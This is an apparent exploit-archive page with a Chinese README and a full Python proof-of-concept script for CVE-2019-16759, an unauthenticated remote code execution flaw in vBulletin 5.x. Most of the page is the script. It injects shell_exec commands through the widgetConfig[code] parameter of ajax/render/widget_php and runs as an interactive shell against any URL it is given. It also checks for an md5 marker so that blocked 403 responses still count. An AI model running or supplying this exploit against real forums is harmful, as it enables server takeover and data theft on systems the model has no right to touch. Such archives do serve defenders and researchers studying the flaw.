Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-16759 PoC — vBulletin 输入验证错误漏洞

Source
Associated Vulnerability
Title:vBulletin 输入验证错误漏洞 (CVE-2019-16759)
Description:vBulletin是美国InternetBrands和vBulletinSolutions公司的一款基于PHP和MySQL的开源Web论坛程序。 vBulletin 5.x版本至5.5.4版本中存在安全漏洞。攻击者可借助‘widgetConfig[code]’参数利用该漏洞执行命令。
Description
vBulletin 5.x  未授权远程代码执行漏洞
Readme
# CVE-2019-16759 vBulletin 5.x  未授权远程代码执行漏洞

![](./CVE-2019-16759.jpg)

## Ps:  有些poc发包过去是403 ,而不是200
增强判断:echo md5('vBulletin');
判断返回包中是否存在be4ea51d962be8308a0099ae1eb3ec63

`print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]`

![](./vBulletin.jpg)

## CVE-2019-16759.py

```
import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

proxies ={
     "http":"http://127.0.0.1:8080/"
}
params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input(">>>Shell= ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
          r = requests.post(url = sys.argv[1], data = params, proxies=proxies)
          if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:
               print
               print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))

```

## 参考链接:

https://seclists.org/fulldisclosure/2019/Sep/31

File Snapshot

[4.0K] /data/pocs/dbb197b19d2b11ca80f2cb10aeebea3b7b19e6af ├── [370K] CVE-2019-16759.jpg ├── [2.0K] CVE-2019-16759.py ├── [1.2K] README.md └── [304K] vBulletin.jpg 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.